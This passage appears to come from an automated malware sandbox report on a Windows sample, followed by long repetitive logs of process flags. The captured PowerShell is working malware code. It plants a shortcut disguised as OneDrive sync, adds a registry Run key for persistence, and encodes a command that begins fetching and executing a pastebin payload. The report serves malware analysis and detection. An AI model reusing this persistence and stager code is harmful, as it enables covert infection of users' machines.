,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Tries to open files direct via NTFS file id
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
